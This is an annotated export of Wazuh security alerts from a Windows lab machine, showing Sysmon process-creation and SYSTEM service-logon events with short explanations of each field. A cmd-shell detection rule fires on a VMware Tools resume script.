decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:53.8873601Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212029 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:53.853
ProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ProcessId: 4044
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:53.853 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533921.291489 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:35.6047549Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43630 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.298825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:41.3826372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43632 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.306163 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:45.2693434Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43634 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.313499 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:54.6551986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212047 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:54.622
ProcessGuid: {94294ddc-2e26-6801-dc07-000000000e00}
ProcessId: 9800
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ParentProcessId: 4044
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:54.622 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e26-6801-dc07-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9800 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.318979 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
